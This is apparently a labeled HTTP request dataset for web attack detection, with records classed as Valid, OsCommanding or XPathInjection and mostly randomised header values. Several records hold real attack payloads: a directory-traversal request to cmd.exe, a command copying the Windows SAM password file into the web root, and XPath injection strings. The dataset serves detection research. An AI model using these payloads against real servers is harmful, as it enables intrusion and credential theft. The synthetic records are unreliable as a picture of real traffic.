GET /l00u0p/faaseov/bselectOEiygwdivG6Pkn/vOFONMCcQ1/oE/hq8JTcvjyWA@j0/ol5bcBalehgqaie4n3o/e6/uEgq04/aItE-QtjzNYswrjVB/igfehu3.mspx?2stdinnY=iUsfn%40Uk&pkaowkt0co=520522&hZ1null-whererVu=sa%5De+sus%5BHr&evalsvRtPDkxp_=9310513&rehaa=kesrtr3woe&nmgCmfrpnhns=Hhnnh&liandecY=Rsas&aamk=2213327&ye=nweueotf&ejttnh8zow=wh&cfcsiBTduoe0t=aaas9opeacerywp-t&PXlPjFHU_px=u3iuasNeiy&8ls=thO1renetcat3i%3BC HTTP/1.1
Host: www.lhEN.uk:114
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: pm8w-bnZtxx;q=0.5, xnhnrA2w-er25de;q=0.6, rmdnd2qy-t1;q=0.9
Cache-Control: min-fresh=5096
Client-ip: 80.170.138.165
Cookie: eegoedhhchnpzft=0192;rmcXjbodyw=e1d
Cookie2: $Version="00"
Date: Tue, 12 Sep 06 05:32:36 UTC
ETag: "8VXrcaxe267wYjWNWF3G"
Expect: 7Iulu
From: ieue@hoegnHqytl.be
If-Modified-Since: Sat, 30 May 09 11:39:40 GMT
If-Unmodified-Since: Sat, 25 Nov 06 08:37:07 UTC
If-Match: "ez2iH@s9eAEAoKrIbNy"
If-None-Match: *
If-Range: Mon, 10 May 04 01:12:02 GMT
Max-Forwards: 642
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: uide iwlucnv=bfge1or
Authorization: Basic d3BhZWt1ZXk6ZWFhbmxqZ2U=
Range: 2390-,9-,2497-
Referer: /ttidsru.php3
TE: deflate;q=0.7,chunked,trailers
Trailer: Date
User-Agent: Mozilla/1.2 (compatible; MSIE 0.6; SunOS sun4u; enuradoteo; becftswa; jern3iylcs)
UA-CPU: MIPS
UA-Disp: 073,150,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 383x664
Via: lle/4.2 90.200.204.51, 2.1 www.0h6dTgtt.gif
Transfer-Encoding: gzip
Upgrade: osunde/3.2, hb1wa/9.8, twa/3.2, aRypee/7.6, knlu8/6.7
Warning: 579 28.101.180.151:87 "tiicEdd" "Tue, 17 May 05 01:19:10 GMT"
X-Forwarded-For: 24.185.22.139
X-Serial-Number: 637220700897
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9455
Start - Id: 23341
class: Valid
GET /Mei6iWantqtnioO/lWdeleteJ3objectS1tvq/blenEgeeh/cGj9/essP5QDEIwx0r71nrFY/eiobEEeot7a.swf?iteni2oc=741&B-0vzK8aW0f6=250&dya=tRQ6VC9lSHzR HTTP/1.0
Host: 52.87.172.187
Connection: close
Accept: application/x-tar;q=0.1, text/*;q=0.0, audio/*
Accept-Charset: euc-jp, windows-1251, iso-8859-8;q=0.6, windows-1252, windows-1253
Accept-Encoding: compress, identity, compress, gzip
Accept-Language: pr-thIrd;q=0.3, i-it;q=0.8, nds-htdg;q=0.4
Cache-Control: only-if-cached
Client-ip: 253.173.161.120
Cookie: alhteett=Xb;l9dgootn=t;toebl=sEsjPhIp7.kC;eNkosmoron=i10MkQVjNkFL
Cookie2: $Version="209"
Date: Mon, 14 Jul 08 24:44:07 UTC
ETag: "eVACl-3mNGn-FXqEH"
Expect: 100-continue
From: eriitwao@Q9ma4lnlsr.net
If-Modified-Since: Wed, 12 Sep 07 21:18:44 GMT
If-Unmodified-Since: Thu, 18 Sep 08 13:19:39 UTC
If-Match: "nHb-KgjCw@MSD6dtuDpt"
If-None-Match: *
If-Range: "i7TQvnTlR0q9BZ6pl"
Max-Forwards: 1
MIME-Version: 8.7
Pragma: ri5n='lsoh9wye'
Proxy-Authorization: Basic OW9lVHQ5OkNXOW9wcjZv
Authorization: paifl imir=l3e6
Range: 65870-,-7
Referer: /ifuPhgr/UkCr.jpg
TE: chunked
Trailer: Warning
User-Agent: ndnzRqT/9.7.5.0
UA-CPU: Sparc
UA-Disp: 9730,3865,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2011x4796
Via: FTP/7.9 116.208.197.65
Transfer-Encoding: gzip
Upgrade: djbm1/8.1, yti/6.3, troL/1.6, aze4re/4.7
Warning: 540 www.9nihi.shtml "atshrnedTnhbRumoe1eN" "Wed, 12 Oct 05 05:44:09 CET"
X-Forwarded-For: 143.52.19.171
X-Serial-Number: 0696294106219
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23341
Start - Id: 6220
class: Valid
PUT /fPrcpUwgetHq8mcb/.5RJaqkbstdinscript73sock_streamQ/ametamcvostwettosuau/uZZaPZT6eux0wKvbQ/eaosttewsep/vuarhamhoiT/3HZ2Jd/7o5aEm/nlMn/hsontemn/q-NHANK.html? HTTP/1.1
Content-Length: 274
Content-Language: Tt,bt
Content-Encoding: deflate
Content-Location: http://fqcw15.org/umeNstbf/kwho6Ea.zip
Content-MD5: dDBsb2RveW5hZ2dpbmhsNA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Aug 04 16:53:24 CET
Last-Modified: Wed, 19 Apr 06 21:37:54 GMT
Host: 220.65.39.178:6
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: us-ascii;q=0.7, x-mac-chinesesimp
Accept-Encoding: deflate;q=0.2, deflate, gzip;q=0.0, identity, gzip;q=0.3
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 49.235.62.5
Cookie: E5mH=iatesu7Aow
Cookie2: $Version="52"
Date: Sat, 16 Dec 06 02:28:39 UTC
ETag: W/"vrmFbeO_tjP@gxn0eL"
Expect: 100-continue
From: ooIos@tieeEwsrcr.de
If-Modified-Since: Fri, 18 Mar 05 21:35:19 UTC
If-Unmodified-Since: Sat, 05 Feb 05 10:02:59 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 09 Nov 05 07:53:54 GMT
Max-Forwards: 74
MIME-Version: 1.5
Pragma: MIiiio=vtpc
Proxy-Authorization: NTLM bW9lbUFiaGVuclNqaW9vYmVXanQ0dHNkYWdpbGxqbnhlZ2FyZWVhUG1mbm1l
Authorization: 0tndEe rFniaat=Llrva4e
Range: 08944-,040-34609
Referer: http://hxeEadk.st/brer/Y0Zsmdi/Gr9S/dk8zf/r1ycaSd7.jpeg
TE: deflate
Trailer: Trailer
User-Agent: fbusart4 (r2CmGSYDhq; t3lKuLPXVX; 1wNxGQQ74L; 9-RBtH1Y)
UA-CPU: 68000
UA-Disp: 5852,332,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 088x2493
Via: FTP/7.2 www.oropi.html:3, HTTP/5.5 251.60.238.238:9, 6.2 30.132.212.238
Transfer-Encoding: compress
Upgrade: hearu/8.5
Warning: 502 www.tuiesn.jpg:49189 "yihldehotit" 
X-Forwarded-For: 108.165.196.92
X-Serial-Number: 3711226
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tooaca=5341&Jsl-m=iiet1i0&ehotiH=eooatshrltar&hhtiov3eyriGazi=7&eiebho=ampT5h&nUtg5mbytrstRaa=dby@sls%position-(iaeeeceA&un=vmttIueuHvHt&ek9nhkvoe3ezekh=4L8eFAPEdXJ&clluzIzqh7sta=fhoveid&sctc6tupes0smeo=ui asenysoreplacew7ml&dEhCen=4&c9ste=eh0ar;e&eaitEorptdc=9p75SG

End - Id: 6220
Start - Id: 722
class: Valid
GET /eL_yE6EPJDe6wMi/d2io628Eumtolu.gif?ihym=0&oRovhibui4r8ufK=pgstwvp3dejvmIfti&ehsd=tsne&e8=%24w&rTtrAnut0efds=dvarVogroup+by2tmpanklgrrce13%28i HTTP/1.1
Host: www.D5odcpn.com:80
Connection: aolt
Accept: */*;q=0.7
Accept-Charset: windows-1255, us-ascii, x-mac-chinesetrad, euc-jp;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 58.235.63.224
Cookie: 2qogadosc=(@us y e;oos5=tqFit:enph-aukajta(r i
Cookie2: $Version="5"
Date: Fri, 22 Dec 06 16:56:32 CET
ETag: W/"3R1QzRCMLW2qhvW"
Expect: 100-continue
From: soeaef8E@trdpelmitT.st
If-Modified-Since: Sun, 06 Aug 06 15:39:23 UTC
If-Unmodified-Since: Sat, 28 Nov 09 10:42:25 CET
If-Match: "RT34PXwLjN4sawt6RR-"
If-None-Match: *
If-Range: Fri, 12 Dec 08 04:31:49 UTC
Max-Forwards: 2440
MIME-Version: 8.8
Pragma: ececes='o7atf'
Proxy-Authorization: riett grerxIas=LSauaaO
Authorization: Digest qop=auth
Range: -523,85-12956,5-
Referer: /G8dsrwse/RnyI9aj/bjhPeens.png
TE: trailers,chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.4 (compatible; MSIE 0.8; Open BSD i386; hmoLKiratv)
UA-CPU: PowerPC
UA-Disp: 573,0887,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 180x0493
Via: 7.5 www.g9tgLtn.css:4098, 6.5 213.207.191.140, 5.7 www.peim.png
Transfer-Encoding: gzip
Upgrade: tge/4.9, sslx/9.8, h1nyOt/0.0, Ocaah/5.6
Warning: 247 www.6atoou9u.css:82615 "7ySec6LYstptsi" 
X-Forwarded-For: 161.122.52.147
X-Serial-Number: 93643715555060287385
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 722
Start - Id: 36550
class: OsCommanding
GET /msadc/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 221.105.15.229:3833
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=16230
Client-ip: 131.100.188.215
Cookie: eaase3loilmrio=588;ttn=215;n6u=5rt3.7Sp1J;wxTcD=cks;VeesexgR=uneeperl O[Ic4m%t;or7y2otR=94
Cookie2: $Version="7"
Date: Sat, 21 Feb 04 03:40:09 GMT
ETag: "qAEfzWG5X7Zdf0i"
Expect: 100-continue
From: h8IMoanr@hlhircha.ch
If-Modified-Since: Tue, 13 Apr 10 10:59:01 UTC
If-Unmodified-Since: Fri, 04 Apr 08 05:43:01 CET
If-Match: "nAj6kUk7xKqAQ0qNL1"
If-None-Match: *
If-Range: Thu, 17 Aug 06 15:44:34 UTC
Max-Forwards: 51
MIME-Version: 5.7
Pragma: romm=ta
Proxy-Authorization: Digest nc=Ad95328B
Authorization: Digest nc=CEfE43E3
Range: -7292
Referer: /nebnda/i8bm.wav
TE: trailers,trailers,chunked
Trailer: Warning
User-Agent: Mozilla/3.0 (Machintosh; U; PPC 0.2; tb-An; rv:6.7.2) Gecko/72172389
UA-CPU: x86
UA-Disp: 1693,583,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 547x5195
Via: 8.6 83.226.211.193, HTTP/4.5 253.69.13.41
Transfer-Encoding: compress
Upgrade: syjne/7.2
Warning: 384 103.114.33.177 "eR8ioli" "Sat, 15 Oct 05 19:32:06 GMT"
X-Forwarded-For: 103.73.131.132
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36550
Start - Id: 30406
class: Valid
GET /ox_ieA45Q8nBh8aMY../iH1IhomeVYVzLYVQ/4ngguJRmoptHzG.asmx?cnr7E9britt=i&ohrseanise=160324775&afrA=692&inp4sLdn=%5BDwinntsd&zstylemHGqdNQid=uoiEa&gsisduoycA=oKsUsxB&I2gi=3416 HTTP/1.0
Host: www.0Segio.fr
Connection: keep-alive
Accept: audio/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: egs-nrtAioa2, nnnIat7-Wnwr;q=0.4, 0ov1-aotnh;q=0.9
Cache-Control: no-transform
Client-ip: 29.42.254.23
Cookie: nml=50208295;peu=2479740944;dLGGbetween9lincludeHy=767122;eoeNmtuqearva=Yeec;okw=pro\
Cookie2: $Version="355"
Date: Sat, 03 Oct 09 04:39:48 CET
ETag: W/"Yw6YpG4ITJ3ZHO4k"
From: wmReuit@hemuh5.fr
If-Modified-Since: Sun, 01 May 05 17:15:11 CET
If-Unmodified-Since: Fri, 26 Oct 07 14:25:32 CET
If-Match: *
If-None-Match: "vixJpJj4kB01eZkK"
If-Range: *
Max-Forwards: 2
MIME-Version: 1.9
Pragma: dkfJO='9tReyh'
Authorization: Digest algorithm=lseb
Referer: http://glrn.de/mtam/0hMeE/whIve6ut/tUd1Bosh/9tedt.php
TE: trailers
User-Agent: 8vJXpF http://www.ystu.st
UA-Pixels: 094x400
Via: HTTP/8.8 www.el8bs.js:19
Transfer-Encoding: gzip
Upgrade: hrn/2.4, mTvSe4/1.5, ua6xno/8.1, tssin/5.7, 7yhoei/2.2
X-Serial-Number: 17997505261977757757
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30406
Start - Id: 50016
class: XPathInjection
PUT /tebrite/6deeEtuls9owlSlo/-3XQDb-u2h.pl? HTTP/1.1
Content-Length: 160
Content-Language: es,xolsFt
Content-Encoding: compress
Content-Location: /p8ira7et.pdf
Content-MD5: b2xpZW40b3VqZWFyZW56bw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 31 May 09 17:23:13 UTC
Last-Modified: Sun, 10 May 09 17:17:49 CET
Host: www.ws0Ei3on.st
Connection: close
Accept: */*
Accept-Charset: euc-cn
Accept-Encoding: ea/w/l2e/child::node()[position()=709] or     'bNinder'  =   '
Accept-Language: *
Cache-Control: min-fresh=90219
Client-ip: 63.108.226.5
Cookie: eB=%shutdownhdztmpprCTecq;y32whtaccesT3Tdf=256524
Cookie2: $Version="2"
Date: Sat, 16 Jul 05 13:27:40 GMT
ETag: "eWyaN0C-S@Xf4fG2R"
Expect: A1a1ao=ix1nii;Dh5t
From: Ecil@targ.fr
If-Modified-Since: Wed, 25 Feb 09 09:29:41 UTC
If-Unmodified-Since: Wed, 22 Nov 06 02:02:31 UTC
If-Match: "FwIsv.YKOL06J1pMQ"
If-None-Match: *
If-Range: Tue, 15 Sep 09 06:43:37 GMT
Max-Forwards: 566
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic Y2JlZmZlcXM6aXJUYw==
Authorization: Basic ZWlucmo6dFllaGpuaQ==
Range: -28912,7700-34
Referer: /mnlwv/tobieIk/nyumhk/uyay.swf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.5 (Machintosh; U; Mac OS X 1.5; ve-lh; rv:2.6.0) Gecko/42659698
UA-CPU: Sparc
UA-Disp: 5539,6840,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 9581x753
Via: 1.2 www.edxba.shtml:148, 4.8 www.iRteeb.htm, hts/7.0 172.214.184.157:938
Transfer-Encoding: gzip
Upgrade: exR/8.9, zdsd/9.0, tOnl/2.3, 6fWla/2.1, ssod/8.7
Warning: 917 www.fiog.gif "Toqsuco" 
X-Serial-Number: 69751520356030770704
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

uom5Sfnihx3vmjn=mLouVWw9a&s5sbcsTr=59&4p4ccuefio=5&8nosc=en3LpanorOqeoito&mltO3s=euaee&gm9=a6osfa/f"9i&aetcOHwst0S=RoIsdnwHt&4ma=7987&enhxtmuKfeL=ttsHLodntR

End - Id: 50016
Start - Id: 4931
class: Valid
POST /nbpth9Mbr7HiI9t/ekLs5ZF8aM3zzv47z11e/FuQGDI9UF/oLXqK5/eBUFoT_Yu5RA@aBsIb2n.cgi? HTTP/1.0
Content-Length: 56
Content-Language: eeoi
Content-Encoding: identity
Content-Location: /eani/oagvony/stab/deaNrwea.fgf
Content-MD5: ZWdlYWk5bG9jaWF0TnlSSA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 14 Sep 04 05:16:01 GMT
Last-Modified: Thu, 29 Mar 07 21:55:58 CET
Host: www.tt0tirwx.de
Connection: Rer7goe
Accept: video/quicktime
Accept-Charset: iso-8859-6, iso-8859-7;q=0.1, iso-8859-9, euc-cn;q=0.7, iso-8859-7
Accept-Encoding: compress;q=0.7, deflate;q=0.6
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 136.86.216.211
Cookie: 3etw=914
Cookie2: $Version="0"
Date: Sun, 15 Feb 04 13:17:32 CET
ETag: "JYaoY47Q5h@FL5ye"
Expect: 100-continue
From: tsamc1M@it8Et.ch
If-Modified-Since: Tue, 02 Feb 10 13:27:09 GMT
If-Unmodified-Since: Thu, 25 Sep 08 12:16:48 UTC
If-Match: *
If-None-Match: *
If-Range: "aOP2vuiUabOHX.HI"
Max-Forwards: 114
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: NTLM bmFmcmV0dHR6MWdBdHB0MXVyaWVpajhrZUVpdXQ1ZWNhZGsydQ==
Authorization: Basic c3V0YXRvbzpuaWFnaEN1bw==
Range: -315573,870-
Referer: /wiRmgaAn/tzhro.pdf
TE: trailers,trailers
Trailer: Expect
User-Agent: niktu7rrIs (1b34VfdCj)
UA-CPU: 68000
UA-Disp: 979,352,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4223x6180
Via: 2.4 www.hnes1.jpg:344
Transfer-Encoding: gzip
Upgrade: bqdln/8.8, lEme/8.7, iedhiw/5.5
Warning: 222 www.oeeeay.gif:8841 "nriml4ld" "Mon, 28 Aug 06 16:14:52 GMT"
X-Forwarded-For: 172.97.206.77
X-Serial-Number: 81307487513405
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ha=ots&ee0=b3SXXPXQB-&eg4d=hret5fnoAu=a&ajatsde=4HDx7K

End - Id: 4931
Start - Id: 36641
class: OsCommanding
GET /Qsystem18qAwtGHC8kZ4/ere7cA.tiff?t9awba=trhioapjai&nn=%27n%25obnode+ei9r&ar2astNboedrdI=82968&zcflnEe=fDdvdgs&YHopenformRBbkKl_=ditjs3&gvY4@=s6pEgbodyi&aeel0gsi6=han3n&ehderi8fsdns=naed HTTP/1.1
Host: www.crE3uoa.be
Connection: keep-alive
Accept: text/*;q=0.4, video/*;q=0.3
Accept-Charset: macintosh
Accept-Encoding: 77.33.168.129 |    copy c:\winnt\repair\sam._ c:\inetpub\wwwroot\sam.ddd
Accept-Language: si-1, r-dtto46, iuqta-bk4d
Cache-Control: max-stale
ETag: W/"2rLav0qyR9SB-U77N8"
From: xlScpe0i@m5tlbfnn.fr
If-Modified-Since: Sun, 11 Feb 07 04:17:09 UTC
If-Unmodified-Since: Mon, 05 Nov 07 21:13:57 UTC
If-None-Match: *
If-Range: Thu, 27 Oct 05 11:50:17 UTC
Max-Forwards: 532
MIME-Version: 2.3
Referer: /8lgZo/otleo/kNdrsa8/drefbL/xiskie3n.exe
Trailer: Proxy-Authorization
User-Agent: 4eiAF.u http://www.hene.be
Upgrade: era/3.5, egberm/3.8

null

End - Id: 36641
Start - Id: 48851
class: XPathInjection
GET /iE8hdN4feayp/Iid/gCWSTp3BN/RAW48V20Mx-VY/askdopAHnpceg.asmx?varU7saIwp-Cjgroup byIy=locationowhereiaag&scriptdthsetc=e_wVU1DXa&saeeOp7zAe3es71=9&nyd=2817+++or++++gria%2Fnsnis%2Fmennn7%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D64%5D+++++or+++++171%3D HTTP/1.0
Host: www.nhseyE.cz:80
Connection: eboee
Accept: text/html, video/mpeg
Accept-Charset: x-mac-turkish, iso-8859-9;q=0.9, windows-1252, koi8-r, x-mac-cyrillic;q=0.7
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.1
Cache-Control: max-stale=46
Client-ip: 250.77.251.179
Cookie: eneMi=fu;ecKsivso1xyvt=wget8openua2bmmone;htdoirdemHIaaa=aytTfainnsaoc;ae9ttnrwaeuatr=m2fl.sMT;smSt=20434747;uClog2=dmevgujfoecs
Cookie2: $Version="89"
Date: Sat, 13 Feb 10 02:02:22 CET
ETag: W/"rIDx8tDHtimlHt6H6"
Expect: 100-continue
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Sat, 22 Sep 07 17:53:36 CET
If-Unmodified-Since: Mon, 09 Apr 07 08:37:48 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: NTLM a05vZXJvNWU1aHRyaGFzM21hblBscHNuZWliMmh0RXRp
Authorization: Basic YU5oYmFucnI6aDg0ZWxUbnM=
Range: 5-03627
Referer: /ustarehi/nrlfl.jsp
TE: chunked,chunked;q=0.5
Trailer: Accept-Language
User-Agent: ldipiioei (rzYuYd1x; ajW7mzk; pus5I8m)
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 412x876
Via: 3.3 www.k8eekecS.shtml:61, FTP/8.6 193.19.0.134, tao/8.4 www.tilfqe5i.htm
Transfer-Encoding: compress
Upgrade: qdiue/5.0
Warning: 687 108.217.115.97 "lnedeee" 
X-Forwarded-For: 239.247.179.124
X-Serial-Number: 177199337529573688
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48851
Start - Id: 18837
class: Valid
GET /er/mno0xegr7sepwstzao/En/hygi1pmaEtd/q_L0.jpg?mm8wumolrliocav=fsn&mhemn3el=i5R&ohetjrrwh=a%24h&aesdeeeiNT=69204043&otc=oE HTTP/1.1
Host: www.jontuhyw.ch
Connection: Rmutrt
Accept: audio/*, video/*, application/postscript
Accept-Charset: *
Accept-Encoding: gzip;q=0.1
Accept-Language: atwflbr-bNzoxBnt;q=0.1, rglceiia-cftp7ae;q=0.3, rii-ostktaat, qx4rnGh-ldo;q=0.5, odirpoIl-sixruia
Cache-Control: no-transform
Client-ip: 208.166.219.41
Cookie: rl=1957804215;dtorBmkgiz3an=647839;IBbAiuK= g t;en3t77aorleweqh=xnoezs;selectexecfya19n=dtd
Cookie2: $Version="84"
Date: Mon, 29 Jan 07 06:47:30 UTC
ETag: W/"FfhxfqFGS02zMiOb"
Expect: 100-continue
From: eiaotdi@tdsHiKyi.biz
If-Modified-Since: Thu, 17 Dec 09 08:36:04 UTC
If-Unmodified-Since: Sat, 04 Jul 09 15:11:49 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 10 Nov 04 12:47:39 GMT
Max-Forwards: 17
MIME-Version: 9.5
Pragma: Tiaaes=le3lttnq
Proxy-Authorization: nrIw tamndt8e=itrl
Authorization: NTLM N3g5RWdmcnRucjNlbmF0aWUxNWxuc3B1ZXJFeDdDdWR1RWFybjFldXdlZXRtanI=
Range: -9,1224-02
Referer: http://xctwEir.st/3eni/eyrarao/2thi0tiR/1pbudd8.ace
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/8.8 (X11; U; Open BSD i586 7.9; st-pe; rv:7.2.9) Gecko/16281762
UA-CPU: MIPS
UA-Disp: 788,1566,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 4455x397
Via: HTTP/2.6 www.rMoap.htm, 9.5 www.esnUdnU.css
Transfer-Encoding: gzip
Upgrade: saO/9.8, oapyT/9.3, zrdrev/7.9, dar7eo/8.4
Warning: 106 www.dh2mlt.jpeg "hscobuAtozegsiEt" "Fri, 20 Jul 07 24:32:32 CET"
X-Forwarded-For: 179.26.107.159
X-Serial-Number: 0589105482767734530
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18837
Start - Id: 3726
class: Valid
GET /ViQnri9/em/_gZnAxtermVyMFI/fcn-u7mq5Zb1M7DC/gG9fF8o/hJvdVa@kDnC7dj/gX/uwlfnh7/mh6cihje/rogvrqN8qN9G/E8-5hidYWIa/eAe.png?o7eeTnzdrnR=nweirye&togdQatNO=ea&oIartpegm1my=attde7wo HTTP/1.0
Host: www.ibEarsix.uk
Connection: wt2iHiTc
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate, compress;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 87.85.120.176
Cookie: slzitofdrii4ks=h htaccesaDvsElunioneu9;iddhnR=8494280;ehu=oh.a@tr_vXUq;Sn=tXkX;oanl7mye5=Iboot.inichildtsygk2m<otjHhW&d;hjmj=22
Cookie2: $Version="8"
Date: Wed, 01 Jun 05 15:45:37 GMT
ETag: W/"iM8.PijE4f7dmDjpg4I"
Expect: 100-continue
From: bTuG@sunaTo.gov
If-Modified-Since: Thu, 19 Aug 04 01:14:06 GMT
If-Unmodified-Since: Wed, 21 Nov 07 07:00:42 GMT
If-Match: *
If-None-Match: *
If-Range: "Mu.y8uQjv6iLJn8H"
Max-Forwards: 504
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Nsot sthssEoE=ooht9
Authorization: Irlntq dein60n=oh1nhz
Range: 355373-92094,2954-
Referer: http://www.Yokgys.org/tge60e/uer7o0o8.txt
TE: trailers,trailers,gzip
Trailer: Expect
User-Agent: Mozilla/6.1 (compatible; Konqueror/5.3; Solaris; hunrnr; ttMhePrse)
UA-CPU: PowerPC
UA-Disp: 7385,2023,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0475x7705
Via: FTP/3.3 www.lnnesss.jpeg
Transfer-Encoding: deflate
Upgrade: gsllay/9.9, kj6hn/8.2
Warning: 836 116.134.212.111 "a0znr0igtS" "Fri, 24 Sep 04 03:35:09 GMT"
X-Forwarded-For: 95.113.101.82
X-Serial-Number: 68867877
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3726
Start - Id: 2654
class: Valid
GET /jI7EoformOQNvXqiBb/oznKJ0cxM1.SuKs/9jNYinsertw.css?zwi=3360&oeego=uoknealmo4fWlu3&ucbe2=0A0thFgrienst HTTP/1.1
Host: 113.198.182.229
Connection: close
Accept: */*
Accept-Charset: x-mac-korean;q=0.6, x-mac-arabic, hz-gb-2312, windows-874, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: 7S-aqlao;q=0.7
Cache-Control: no-transform
Client-ip: 133.198.3.102
Cookie: Sulgeaesr=719791;doaoA=l8letallr  1(;J-KuzDW@=369590
Cookie2: $Version="132"
Date: Tue, 09 Nov 04 01:02:46 CET
ETag: "S3xPaPK3W_0T2EyCNJF-"
Expect: 100-continue
From: lTjo@rnyrn.org
If-Modified-Since: Wed, 26 May 04 04:26:27 CET
If-Unmodified-Since: Sat, 09 Oct 04 10:02:32 GMT
If-Match: *
If-None-Match: "gVr80K8tgjDT5prIhGK"
If-Range: "r1@vx.IchxYcCS9CE"
Max-Forwards: 41
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic YXNvdHNkT246b3JuZQ==
Range: 78017-732
Referer: /tiaocoe/evLcodp/4iUm2tA/brnt1irE/tZiemsn.css
TE: trailers
Trailer: Accept-Charset
User-Agent: iehemehe
UA-CPU: x86
UA-Disp: 5435,722,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 834x080
Via: 4.0 www.tuta.html
Transfer-Encoding: gzip
Upgrade: YMots/9.9, 2loo/9.6, cgTcde/7.3, ltne1/8.2, mro0ot/2.9
Warning: 692 www.6ine.png "xa9d" "Fri, 03 Apr 09 06:38:55 UTC"
X-Forwarded-For: 196.188.242.124
X-Serial-Number: 8136074594585
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2654
Start - Id: 22961
class: Valid
GET /%urmrm5_/aC3sLYIw_iR5HCE22D/awMUd/cmNNc/e4ka6odmlm/TNd./y8_QfiB/cqVlvTKmC3.d4e8RhH/lPqE_s5Ri-.cH-b/2yg2zpIPc.f27GVCJ2/rRFnjO-.swf?snd=4758114&hfnimeoe=9411&httpsWChtacces6iframe1-=211450&Dsn4oTA5naiuF=74hsi2&ttq0o1=mdkedbaap9qo6sgei&ETew4smti=9ot%3E%5D%7E%3Ex HTTP/1.1
Host: 222.130.218.100:56
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-korean, windows-1250;q=0.8, euc-jp, koi8;q=0.7, windows-1258
Accept-Encoding: deflate;q=0.9
Accept-Language: jdo-An
Cache-Control: no-transform
Client-ip: 233.95.90.161
Cookie: t6gonbhNj=eBP-Jum
Cookie2: $Version="359"
Date: Thu, 28 Feb 08 08:25:36 UTC
ETag: W/"PZN8hKm3JF19X2Y"
Expect: 100-continue
From: ap2o@ettoab6r.com
If-Modified-Since: Sun, 26 Oct 08 16:29:12 UTC
If-Unmodified-Since: Sun, 11 Mar 07 21:12:02 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic dHByY2xVOmxmZTFP
Authorization: NTLM aGF3ZXJjeDV1dmh4YWF0YXptYm9tbmJkeXRvY2x3YWZ1dWl0c25yaGQ4aU9qd2E=
Range: 31732-,84218-
Referer: /fohMfe.doc
TE: chunked;q=0.7
Trailer: Pragma
User-Agent: turnNvW
UA-CPU: x86
UA-Disp: 893,727,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 159x1338
Via: FTP/2.7 223.167.2.115, 5.8 www.jstds.htm, HTTP/1.8 194.114.153.156
Transfer-Encoding: compress
Upgrade: ydd/0.9, hoiens/0.1
